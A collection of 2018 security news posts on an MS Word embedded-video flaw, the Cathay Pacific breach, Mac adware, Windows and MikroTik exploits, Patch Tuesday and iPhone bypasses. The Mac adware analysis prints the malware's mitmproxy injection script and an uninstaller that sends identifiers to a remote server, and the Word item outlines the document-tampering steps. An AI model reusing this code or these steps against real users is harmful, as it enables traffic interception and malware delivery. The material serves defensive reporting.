Unpatched MS Word Flaw Could Allow Hackers to Infect Your Computer

Cybersecurity researchers have revealed an unpatched logical flaw in Microsoft Office 2016 and older versions that could allow an attacker to embed malicious code inside a document file, tricking users into running malware onto their computers.

Discovered by researchers at Cymulate, the bug abuses the ‘Online Video‘ option in Word documents, a feature that allows users to embedded an online video with a link to YouTube, as shown.

When a user adds an online video link to an MS Word document, the Online Video feature automatically generates an HTML embed script, which is executed when the thumbnail inside the document is clicked by the viewer.

Researchers decided to go public with their findings three months after Microsoft refused to acknowledge the reported issue as a security vulnerability.

How Does the New MS Word Attack Works?

Since the Word Doc files (.docx) are actually zip packages of its media and configuration files, it can easily be opened and edited.

microsoft office online video hack

According to the researchers, the configuration file called ‘document.xml,’ which is a default XML file used by Word and contains the generated embedded-video code, can be edited to replace the current video iFrame code with any HTML or javascript code that would run in the background.

In simple words, an attacker can exploit the bug by replacing the actual YouTube video with a malicious one that would get executed by the Internet Explorer Download Manager.

“Inside the .xml file, look for the embeddedHtml parameter (under WebVideoPr) which contains the Youtube iframe code,” the researchers said.

“Save the changes in the document.xml file, update the docx package with the modified XML and open the document. No security warning is presented while opening this document with Microsoft Word.”

 

Video Demonstration: MS Word Online Video Flaw

To prove the extent of the vulnerability, Cymulate researchers created a proof-of-concept attack, demonstrating how a maliciously crafted document with an embed video, which if clicked, would prompt user to run an embedded executable (as a blob of a base64)–without downloading anything from the internet or displaying any security warning when the victim clicks on the video thumbnail.

cybersecurity html code

The hack requires an attacker to convince victims into opening a document and then clicking on an embedded video link.

Cymulate researchers responsibly reported this bug, which impacts all users with MS Office 2016 and older versions of the productivity suite, three months ago to Microsoft, but the company refused to acknowledge it as a security vulnerability.

Apparently, Microsoft has no plans to fix the issue and says its software is “properly interpreting HTML as designed.”

Meanwhile, researchers recommended enterprise administrators to block Word documents containing the embedded video tag: “embeddedHtml” in the Document.xml file, and end users are advised not to open uninvited email attachments from unknown or suspicious sources.

Go to Source

Huge breach affects 9 million Cathay Pacific customers

Airlines aren’t having a good time of things at the moment. Even if you managed to dodge the recent British Airways fallout, you may well be caught up in the latest breach affecting no fewer than 9 million customers of Cathay Pacific.

So what was taken? The impact this time around isn’t so much where payment information is concerned, as the 403 credit card numbers the hackers grabbed had all expired, and the 27 live ones had no CVV stored. It isn’t even passwords, as the airline claims none of those were grabbed. The issue is that the hackers took 860,000 passport numbers, 240 Hong Kong identity cards, and all personal data that goes with it.

What Personally Identifiable Information (PII) was compromised?

Here’s what the criminals ran away with in the Cathay Pacific breach: PII. Namely: nationality, date of birth, name, address, email, telephone numbers, frequent flyer membership numbers, customer service remarks, and “historical travel information.” The data accessed from passenger to passenger varies, so there’ll be some with almost nothing to worry about and others wondering how they drew several short straws simultaneously.

If you’re wondering why breachers continue to steal PII, this data is incredibly useful for anybody planning a targeted attack, be it phishing, social engineering, or plain old convincing malware. Some of the scams could easily become real-world issues, as opposed staying firmly behind the computer screen.

At this point, we’d typically advise anyone affected by the breach to be extremely cautious of any missive sent their way from those claiming to be Cathay Pacific. Don’t hand over payment information to random phone callers, avoid clickable links in emails persuading you that your password has expired, and so on.

There’s only one slight problem with this: the breach apparently took place in March 2018, or at least that’s when they discovered a breach had taken place. It then took until May for them to confirm data had been accessed without permission.

As a result, it may not be much use at this point to say “Watch out for this” when it’s already happened. If the airline is correct in its thinking that no data has been abused yet, then what you can do is visit the website set up in the wake of the breach (called a “Data security event”) and use the relevant link for US and non-US customers to get things moving.

Note that Cathay Pacific points out they’ll never ask for personal/financial information related to this breach, and they also list a sole email point of contact for any further communications. Should you receive a note from an address other than the one mentioned, you can safely ignore it.

To ease the fears of worried customers, Cathay Pacific are offering ID monitoring services. And if you’re not sure if you’ve been affected, you can send them a message and they’ll get back to you.

Airlines are increasingly coming under attack from individuals with an eye for large pots of valuable customer data, and even their apps are considered fair game. Whether large fines or other consequences for Cathay Pacific emerge remains to be seen, but taking to the skies is anxiety-filled enough without having to worry about the safety of your data back on terra firma. One would hope this is the last major airline breach we’ll see for a while, but on the evidence we’ve seen so far, they’ll be a prime slice of hacker real estate for some time to come.

The post Huge breach affects 9 million Cathay Pacific customers appeared first on Malwarebytes Labs.

Go to Source
Author: Christopher Boyd

Mac malware intercepts encrypted web traffic for ad injection

Last week, Malwarebytes researcher Adam Thomas found an interesting new piece of Mac malware that exhibits some troubling behaviors, including intercepting encrypted web traffic to inject ads. Let’s take a closer look at this adware, which Malwarebytes for Mac detects as OSX.SearchAwesome, to see how it’s installed, its behavior, and the implications of this kind of attack.

Installation

The malware is found on a rather bland disk image file, without any of the usual decorations that could make it look like a legitimate installer.

When opened, the app does not present an installer display but instead invisibly installs its components. The only evidence that it is doing anything at all comes from two authentication requests. The first is a request to authorize changes to Certificate Trust Settings.

The second is to allow something called spi to modify the network configuration.

Since this malware was delivered at a second stage, downloaded by another malicious installer—a supposed cracked app from a torrent—this makes sense. It has no need for a pretty user interface, as the user will never see anything more than the password requests, and those will be within the context of another installer.

Adware behavior

The spinstall app, like lots of adware, installs an application and a couple launch agents:

/Applications/spi.app
~/Library/LaunchAgents/spid-uninstall.plist
~/Library/LaunchAgents/spid.plist

The spid.plist agent is designed to launch spi.app, but interestingly is not designed to keep the app running constantly. If the user forces the app to quit, it will not re-open until the computer restarts or the user logs out and back in.

Interestingly, the spid-uninstall.plist agent monitors spi.app for removal, and if the app gets removed somehow, it removes the other components of the malware. (More on this shortly.)

However, it also diverges significantly from other adware by installing a certificate to be used for a man-in-the-middle (MitM) attack, where malware is able to insert itself into a chain of custody somewhere, typically with network packets.

In this case, the malware uses the certificate as the first step in gaining access to https traffic, which is normally encrypted between the browser and the website and can’t be viewed by other software. However, a certificate that is trusted by the system—and, if you entered your password when asked during installation, the certificate will be trusted—can be used to intercept https traffic.

Next, the malware installs an open-source program called mitmproxy. According to the mitmproxy website, the software “can be used to intercept, inspect, modify, and replay web traffic.” With the certificate, which is actually owned by the mitmproxy project, the software is able to do this not just with unencrypted http traffic, but also with encrypted https traffic.

The software is designed to use this capability to modify web traffic for the purpose of injecting JavaScript into every page. This can be seen in an inject.py script installed by the malware:

from mitmproxy import http

def response(flow: http.HTTPFlow) -> None:
    if flow.response.status_code == 200:
        if "text/html" in flow.response.headers["content-type"]:
            flow.response.headers.pop("content-security-policy", None)
            flow.response.headers.pop("content-security-policy-report-only", None)
            script_url = "https://chaumonttechnology.com/ia/script/d.php?uid=d7a477399cd589dcfe240e9f5c3398e2&a=3675&v=a1.0.0.25"
            html = flow.response.content
            html = html.decode().replace("", "http://+script_url+")
            flow.response.content = str(html).encode("utf8")

As shown here, the malware injects a script loaded from a malicious website at the end of every webpage loaded on the infected computer.

Uninstaller

If spi.app is deleted, the spid-uninstall.plist agent will run the following script:

if ! [ -d "/Applications/spi.app" ]; then
networksetup -setwebproxystate "Wi-Fi" off
networksetup -setsecurewebproxystate "Wi-Fi" off
networksetup -setwebproxystate "Ethernet" off
networksetup -setsecurewebproxystate "Ethernet" off

VERSION=$(defaults read com.searchpage.spi version)
AID=$(defaults read com.searchpage.spi aid)
UNIQUE_ID=$(defaults read com.searchpage.spi unique_id)

curl "http://www.searchawesome.net/uninstall.php?un=1&v=$VERSION&reason=&unique_id=$UNIQUE_ID&aid=$AID"

defaults delete com.searchpage.spi
defaults delete com.searchpage.spiinstall

rm ~/Library/LaunchAgents/spid-uninstall.plist
rm ~/Library/LaunchAgents/spid.plist
fi

This does several things. First, it disables the proxy that was set up initially. Next, it gets some information from the program’s preferences and sends that information up to a web server. Finally, it removes the preferences and the launch agents (though it does not properly unload them).

At the first step in the process, the script will cause an authentication request to appear four times, each time requiring a password.

I generally do not recommend using uninstallers that are provided by the malware you want to remove. There have been a number of cases where an uninstaller has been known to install new components while removing others. An example is the Genieo malware, which has been known to do this repeatedly over the years, starting back in 2014.

In the case of this uninstaller, it’s important to note that it leaves behind the mitmproxy software, as well as the certificate used by mitmproxy to access encrypted web traffic, which has been marked as trusted by the system.

Implications

This adware, at first glance, seems to be fairly innocuous, since it’s just injecting a script that serves up advertisements. Looks can be deceiving, though. Since that script is being loaded from a server, that server’s content could change at any time. It could change from serving ads to siphoning off user data or redirecting the user to a phishing site. Imagine, for example, if a script were injected only on a particular bank’s website, and that script redirected the user to a phishing page designed to steal the user’s banking credentials.

The injected script could be used to do anything, from mining cryptocurrency to capturing browsing data to keylogging and more. Worse, the malware itself could invisibly capture data through the MitM attack, without relying on JavaScript or modifying the web page content.

Even once the malware is gone, its potential for damage is not over. By leaving behind the tools it used to execute a MitM attack, it sets up a situation where another piece of malware—perhaps one more nefarious than this one—could take advantage of the presence of those tools to do its own capturing of encrypted web traffic.

Malwarebytes for Mac will detect and remove the components of this malware, which is detected as OSX.SearchAwesome. However, it will not remove the components of mitmproxy, since that is a legitimate open-source tool. If you are infected, you should remove the mitmproxy certificate from the keychain (using Keychain Utility).

Indicators of compromise

If you see any of the following on a Mac, they are indicators that the machine has been infected with this malware:

/Applications/spi.app
~/Library/LaunchAgents/spid-uninstall.plist
~/Library/LaunchAgents/spid.plist
~/Library/SPI/

The following items are a sign that mitmproxy is or has been installed:

~/.mitmproxy/

A certificate with the common name mitmproxy:

The post Mac malware intercepts encrypted web traffic for ad injection appeared first on Malwarebytes Labs.

Go to Source
Author: Thomas Reed

Hacker Discloses New Windows Zero-Day Exploit On Twitter

A security researcher with Twitter alias SandboxEscaper—who two months ago publicly dropped a zero-day exploit for Microsoft Windows Task Scheduler—has yesterday released another proof-of-concept exploit for a new Windows zero-day vulnerability.

SandboxEscaper posted a link to a Github page hosting a proof-of-concept (PoC) exploit for the vulnerability that appears to be a privilege escalation flaw residing in Microsoft Data Sharing (dssvc.dll).

The Data Sharing Service is a local service that runs as LocalSystem account with extensive privileges and provides data brokering between applications.

The flaw could allow a low-privileged attacker to elevate their privileges on a target system, though the PoC exploit code (deletebug.exe) released by the researcher only allows a low privileged user to delete critical system files—that otherwise would only be possible via admin level privileges.

“Not the same bug I posted a while back, this doesn’t write garbage to files but actually deletes them.. meaning you can delete application dll’s and hope they go look for them in user write-able locations. Or delete stuff used by system services c:\windows\temp and hijack them,” the researcher wrote.

Since the Microsoft Data Sharing service was introduced in Windows 10 and recent versions of Windows server editions, the vulnerability does not affect older versions of Windows operating systems including 7 or 8.1.

The PoC exploit has successfully been tested against “fully-patched Windows 10 system” with the latest October 2018 security updates, Server 2016 and Server 2019, but we do not recommend you to run the PoC, as it could crash your operating system.

This is the second time in less than two months SandboxEscaper has leaked a Windows zero-day vulnerability.

In late August, the researcher exposed details and PoC exploit for a local privilege escalation vulnerability in Microsoft Windows Task Scheduler occurred due to errors in the handling of the Advanced Local Procedure Call (ALPC) service.

Shortly after the PoC released for the previous Windows zero-day flaw, the exploit was found actively being exploited in the wild, before Microsoft addressed the issue in the September 2018 Security Patch Tuesday Updates.

SandboxEscaper’s irresponsible disclosure once again has left all Windows users vulnerable to the hackers until the next month’s security Patch Tuesday, which is scheduled for November 13, 2018.

Go to Source

From Now On, Only Default Android Apps Can Access Call Log and SMS Data

A few hours ago the company announced its “non-shocking” plans to shut down Google+ social media network following a “shocking” data breach incident.

Now to prevent abuse and potential leakage of sensitive data to third-party app developers, Google has made several significant changes giving users more control over what type of data they choose to share with each app.

The changes are part of Google’s Project Strobe—a “root-and-branch” review of third-party developers access to Google account and Android device data and of its idea around apps’ data access.

Restricted Call Log and SMS Permissions for Apps

Google announced some new changes to the way permissions are approved for Android apps to prevent abuse and potential leakage of sensitive call and text log data by third-party developers.

While the apps are only supposed to request permission those are required for functioning properly, any Android app can ask permission to access your phone and SMS data unnecessarily.

To prevent users against surveillance and commercial spyware apps, Google has finally included a new rule under its Google Play Developer Policy that now limits Call Log and SMS permission usage to your “default” phone or SMS apps only.

“Only an app that you’ve selected as your default app for making calls or text messages will be able to make these requests. (There are some exceptions—e.g., voicemail and backup apps.),” Google said.

 

Restricted Gmail API for Limited Apps

Since APIs can allow developers to access your susceptible data from your Gmail email account, Google has now finally decided to limit access to Gmail API only for apps that directly enhance email functionality—such as email clients, email backup services and productivity services.

New Privacy Interface for Third-Party App Permissions

When third-party app prompts users to access their Google account data, clicking “allow” approve all requested permissions at once, leaving an opportunity for malicious apps to trick users into giving away powerful permissions.

But now Google has updated its Account Permissions system that asks for each requested permission individually rather than all at once, giving users more control over what type of account data they choose to share with each app.

Third-Party App Permissions

While the change went into effect today, the developers have been given 90 days (January 6th) update their apps and services. After that, the updated Developer Policy will get enforced on its own.

Besides these changes, in next few hours, at 11 AM ET, Google is going to announce some cool new gadgets and Pixel devices at its third annual “Made By Google” event in New York.

Go to Source

Microsoft Patch Tuesday — October 18: Vulnerability disclosures

Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 49 vulnerabilities, 12 of which are rated “critical,” 34 that are rated “important,” two that are considered to have “moderate” severity and one that’s rated as “low.”

The advisories cover bugs in the Chakra scripting engine, the Microsoft Edge internet browser and the Microsoft Office suite of products, among other software.

This update also includes a critical advisory that covers updates to the Microsoft Office suite of products.

Critical vulnerabilities

Microsoft has disclosed 12 critical vulnerabilities this month, which we will highlight below.

CVE-2018-8491CVE-2018-8460 and CVE-2018-8509 are memory corruption vulnerabilities in the Internet Explorer web browser. In both cases, an attacker needs to trick the user into visiting a specially crafted, malicious website that can corrupt the browser’s memory, allowing for remote code execution in the context of the current user. This class of vulnerabilities is especially dangerous since a spam campaign can be used to trick the user while hiding the attack from network protections with HTTPS.

CVE-2018-8473 is a remote code execution vulnerability in Microsoft Edge. The bug lies in the way the web browser accesses objects in memory. An attacker could trick a user into visiting a malicious website or take advantage of a website that accepts user-created content or advertisements in order to exploit this vulnerability.

CVE-2018-8513CVE-2018-8500CVE-2018-8511CVE-2018-8505 and CVE-2018-8510 are memory corruption vulnerabilities in the Chakra scripting engine that affects a variety of products. In all cases, an attacker could exploit these vulnerabilities to execute code on the system in the context of the current user and completely take over the system. This class of vulnerabilities is especially dangerous since a spam campaign can be used to trick the user while hiding the attack from network protections with HTTPS.

CVE-2018-8494 is a remote code execution vulnerability that exists when the MSXML parser in Microsoft XML Core Services processes user input. An attacker can exploit this bug by invoking MSXML through a web browser on a specially crafted website. The user also needs to convince the user to open the web page.

CVE-2018-8490 and CVE-2018-8489 are remote code execution vulnerabilities in the Windows Hyper-V hypervisor. The bugs lie in the way the host server on Hyper-V fails to properly validate input from an authenticated user on a guest operating system. An attacker could exploit these vulnerabilities by running a specially crafted application on a guest operating system that could cause the Hyper-V host operating system to execute arbitrary code.

Important vulnerabilities

There are also 34 important vulnerabilities in this release. We would like to specifically highlight 22 of them.

CVE-2018-8512 is a security feature bypass vulnerability in Microsoft Edge. The web browser improperly validates certain specially crafted documents in the Edge Content Security Policy (CSP), which could allow an attacker to trick a user into loading a malicious page.

CVE-2018-8448 is an elevation of privilege vulnerability in the Microsoft Exchange email server. The bug exists in the way that Exchange Outlook Web Access improperly handles web requests. An attacker could exploit this vulnerability by performing script or content injection attacks that trick the user into disclosing sensitive information. They could also trick the user into providing login credentials via social engineering in an email or chat client.

CVE-2018-8453 is an elevation of privilege vulnerability in the Windows operating system that occurs when the Win32k component improperly handles objects in memory. An attacker could obtain the ability to run arbitrary code in kernel mode by logging onto the system and then run a specially crafted application.

CVE-2018-8484 is an elevation of privilege vulnerability in the DirectX Graphics Kernel driver that exists when the driver improperly handles objects in memory. An attacker could log onto the system and execute a specially crafted application to exploit this bug and run processes in an elevated context.

CVE-2018-8423 is a remote code execution vulnerability in the Microsoft JET Database Engine that could allow an attacker to take control of an affected system. A user must open or import a specially crafted Microsoft JET Database Engine file on the system in order to exploit this bug. They could also trick a user into opening a malicious file via email.

CVE-2018-8502 is a security feature bypass vulnerability in Microsoft Excel when the software fails to properly handle objects in protected view. An attacker could execute arbitrary code in the context of the current user if they convince the user to open a specially crafted, malicious Excel document via email or on a web page. This bug cannot be exploited if the user opens the Excel file in just the preview pane.

CVE-2018-8501 is a security feature bypass vulnerability in Microsoft PowerPoint. The bug exists when the software improperly handles objects in protected view. An attacker can execute arbitrary code in the context of the current user if they convince the user to open a specially crafted PowerPoint file. This bug cannot be exploited if the user only opens the file in preview mode.

CVE-2018-8432 is a remote code execution vulnerability that lies in the way Microsoft Graphics Components handles objects in memory. A user would have to open a specially crafted file in order to trigger this bug.

CVE-2018-8504 is a security feature bypass vulnerability in the Microsoft Word word processor. There is a flaw in the way the software handles objects in protected view. An attacker could obtain the ability to arbitrarily execute code in the context of the current user if they convince the user to open a malicious Word document. The bug cannot be triggered if the user opens the file in preview mode.

CVE-2018-8427 is an information disclosure vulnerability in Microsoft Graphics Components. An attacker could exploit this vulnerability by tricking the user into opening a specially crafted file, which would expose memory layout.

CVE-2018-8480 is an elevation of privilege vulnerability in the Microsoft SharePoint collaborative platform. The bug lies in the way the software improperly sanitizes a specially crafted web request to an affected SharePoint server. An attacker could exploit this vulnerability by sending a specially crafted request to an affected SharePoint server.

CVE-2018-8518CVE-2018-8488 and CVE-2018-8498 are elevation of privilege vulnerabilities in the Microsoft SharePoint Server. An attacker can exploit these bugs by sending a specially crafted request to an affected SharePoint server, allowing them to carry out cross-site scripting attacks and execute code in the context of the current user.

CVE-2018-8333 is an elevation of privilege vulnerability in Filter Management that exists when the program improperly handles objects in memory. An attacker needs to log onto the system and delete a specially crafted file in order to exploit this bug, which could lead to them gaining the ability to execute code in the context of an elevated user.

CVE-2018-8411 is an elevation of privilege vulnerability that exists when the NFTS file system improperly checks access. An attacker needs to log onto the system to exploit this bug and then run a specially crafted application, which could lead to the attacker running processes in an elevated context.

CVE-2018-8320 is a security feature bypass vulnerability that exists in the DNS Global Blocklist feature. An attacker who exploits this bug could redirect traffic to a malicious DNS endpoint.

CVE-2018-8492 is a security bypass vulnerability in the Device Guard Windows feature that could allow an attacker to inject malicious code into Windows PowerShell. An attacker needs direct access to the machine in order to exploit this bug, and then inject malicious code into a script that is trusted by the Code Integrity policy. The malicious code would then run with the same access level as the script, and bypass the integrity policy.

CVE-2018-8329 is an elevation of privilege vulnerability in Linux on Windows. The bug lies in the way Linux improperly handles objects in memory. An attacker can completely take control of an affected system after logging onto the system and running a specially crafted application.

CVE-2018-8497 is an elevation of privilege vulnerability that exists in the way the Windows Kernel handles objects in memory. A locally authenticated attacker can exploit this bug by running a specially crafted application.

CVE-2018-8495 is a remote code execution vulnerability that exists in the way Windows Shell handles URIs. An attacker needs to convince the user to visit a specially crafted website on Microsoft Edge in order to exploit this vulnerability.

CVE-2018-8413 is a remote code execution vulnerability that exists when “Windows Theme API” improperly decompresses files. A victim can exploit this bug by convincing the user to open a specially crafted file via an email, chat client message or on a malicious web page, allowing the attacker to execute code in the context of the current user.

Other important vulnerabilities:

Moderate vulnerabilities

Of the two moderate vulnerabilities disclosed by Microsoft, Talos believes one is worth highlighting.

CVE-2010-3190 is a remote code execution vulnerability in the way that certain applications built using Microsoft Foundation Classes handle the loading of DLL files. An attacker could take complete control of an affected system by exploiting this vulnerability. At the time this bug was first disclosed, Exchange Server was not identified as an in-scope product, which is why this release highlights a flaw from 2010.

The other moderate vulnerability is CVE-2018-8533.

Low vulnerability

There is also one low-rated vulnerability, which Talos wishes to highlight.

CVE-2018-8503 is a remote code execution vulnerability in the way that Chakra scripting engine handles objects in memory in the Microsoft Edge web browser. An attacker needs to convince a user to visit a malicious website or malicious content on a web page that allows user-created content or advertisements in order to exploit this bug.

Go to Source
Author: Talos Group

New Exploit for MikroTik Router WinBox Vulnerability Gives Full Root Access

A known vulnerability in MikroTik routers is potentially far more dangerous than previously thought.

A cybersecurity researcher from Tenable Research has released a new proof-of-concept (PoC) RCE attack for an old directory traversal vulnerability that was found and patched within a day of its discovery in April this year.

The vulnerability, identified as CVE-2018-14847, was initially rated as medium in severity but should now be rated critical because the new hacking technique used against vulnerable MikroTik routers allows attackers to remotely execute code on affected devices and gain a root shell.

The vulnerability impacts Winbox—a management component for administrators to set up their routers using a Web-based interface—and a Windows GUI application for the RouterOS software used by the MikroTik devices.

The vulnerability allows “remote attackers to bypass authentication and read arbitrary files by modifying a request to change one byte related to a Session ID.”

New Hack Turned ‘Medium’ MikroTik Vulnerability Into ‘Critical’

However, the new attack method found by Tenable Research exploits the same vulnerability and takes it to one step ahead.

A PoC exploit, called “By the Way,” released by Tenable Research Jacob Baines, first uses directory traversal vulnerability to steal administrator login credentials from user database file and the then writes another file on the system to gain root shell access remotely.

In other words, the new exploit could allow unauthorized attackers to hack MikroTik’s RouterOS system, deploy malware payloads or bypass router firewall protections.

The technique is yet another security blow against MikroTik routers, which was previously targeted by the VPNFilter malware and used in an extensive cryptojacking campaign uncovered a few months ago.

New MikroTik Router Vulnerabilities

Besides this, Tenable Research also disclosed additional MikroTik RouterOS vulnerabilities, including:

  • CVE-2018-1156—A stack buffer overflow flaw that could allow an authenticated remote code execution, allowing attackers to gain full system access and access to any internal system that uses the router.
  • CVE-2018-1157—A file upload memory exhaustion flaw that allows an authenticated remote attacker to crash the HTTP server.
  • CVE-2018-1159—A www memory corruption flaw that could crash the HTTP server by rapidly authenticating and disconnecting.
  • CVE-2018-1158—A recursive parsing stack exhaustion issue that could crash the HTTP server via recursive parsing of JSON.

The vulnerabilities impact Mikrotik RouterOS firmware versions before 6.42.7 and 6.40.9.

Tenable Research reported the issues to MikroTik in May, and the company addressed the vulnerabilities by releasing its RouterOS versions 6.40.9, 6.42.7 and 6.43 in August.

While all the vulnerabilities were patched over a month ago, a recent scan by Tenable Research revealed that 70 percent of routers (which equals to 200,000) are still vulnerable to attack.

The bottom line: If you own a MikroTik router and you have not updated its RouterOS, you should do it right now.

Also, if you are still using default credentials on your router, it is high time to change the default password and keep a unique, long and complex password.

Go to Source

New iPhone Passcode Bypass Hack Exposes Photos and Contacts

Looking for a hack to bypass the passcode or screen lock on iPhones?

Jose Rodriguez, an iPhone enthusiast, has discovered a passcode bypass vulnerability in Apple’s new iOS version 12 that potentially allows an attacker to access photos and contacts, including phone numbers and emails, on a locked iPhone XS and other recent iPhone models.

Rodriguez, who also discovered iPhone lock screen hacks in the past, has posted two videos (in Spanish) on his YouTube channel under the account name Videosdebarraquito demonstrating a complicated 37-step iPhone passcode bypass process.

The iPhone authorization screen bypass flaw works on the latest iPhones, including the iPhone XS, running Apple’s latest iOS 12 beta and iOS 12 operating systems.

Video Demonstrations: Here’s How to Bypass iPhone Passcode

As you can watch in the video demonstrations, the iPhone hack works provided the attacker has physical access to the targeted iPhone that has Siri enabled and Face ID either disabled or physically covered.

Once these requirements are satisfied, the attacker can begin the complicated 37-step iPhone passcode bypass process by tricking Siri and iOS accessibility feature called VoiceOver to sidestep the iPhone’s passcode.

Soon after Rodriguez released his videos, a tech channel on YouTube under the handle EverythingApplePro published a video in English explaining the same passcode bypass hack on iPhone XS.

This iPhone passcode bypass method potentially allows the attacker to access the contacts stored in the iPhone, including phone numbers and email addresses, and to access Camera Roll and other photo folders, by selecting a contact to edit and change its image.

Though Apple has some built-in security measures to prevent this from happening, Rodriguez found a way to bypass those security barriers, as you can see in the video.

Here’s how to Fix the iPhone Passcode Bypass Bug

The passcode bypass methods work on all iPhones including the latest iPhone XS lineup, but the company does not appear to have patched the vulnerabilities in the latest iOS 12.1 beta.

Until Apple comes up with a fix, you can temporarily fix the issue by just disabling Siri from the lockscreen. Here’s how to disable Siri:

  • Go to the Settings → Face ID & Passcode (Touch ID & Passcode on iPhones with Touch ID) and Disable Siri toggle under “Allow access when locked.”

Of course, disabling Siri would cripple your iOS 12 experience, but would prevent attackers from abusing the feature and breaking into your iPhone.

Meanwhile, just wait for Apple to issue a software update to address the issue as soon as possible.

iPhone passcode bypass hack has become common over the last few years and appears almost after every iOS release. An iOS 9.3.1 passcode bypass was found last year, allowing an attacker to bypass Siri to search Twitter and gain access to locked iPhone’s photos and contacts.

Go to Source

Pangu Hackers have Jailbroken iOS 12 on Apple’s New iPhone XS

Bad news for Apple.

The Chinese hacking team Pangu is back and has once again surprised everyone with a jailbreak for iOS 12 running on the brand-new iPhone XS.

Well, that was really fast.

Pangu jailbreak team has been quiet for a while, since it last released the untethered jailbreak tool for iOS 9 back in October 2015.

Jailbreaking is a process of removing limitations on Apple’s iOS devices so users can install third-party software not certified by Apple.

Today, Android and iOS security researcher Min(Spark) Zheng shared a Tweet with two screenshots showing a working jailbreak on Apple’s newly released iPhone XS with A12 Bionic chip achieved by one of the Pangu researchers.

The Tweet also revealed that the iOS 12 jailbreak works by bypassing a functional PAC (Pointer authentication codes) mitigation implemented in the new Apple’s A12 Bionic chip.

pangu hacking team

Moreover, since the hardware of iPhone XS is very much identical to iPhone XS Max, the new iOS 12 jailbreak exploit should also work on both Apple’s latest flagship iPhones.

Since the Pangu jailbreak team has not made any official announcement regarding the new jailbreak, it is not clear whether or not the team will release the iOS 12 jailbreak to the public.

Also, before jailbreaking your Apple devices, just keep in mind that this will violate your End User License Agreement with Apple and also exposes your iOS device to security bugs, putting your personal data at risk, for which you won’t be getting Apple’s help if anything goes wrong.

Jailbreaking your iPhones also opens up your device to iOS malware such as KeyRaider and YiSpectorthat specifically targeted iOS users with jailbroken devices.

So, how are you feeling right now about the new jailbreaking? Let us know in the comments below.

Go to Source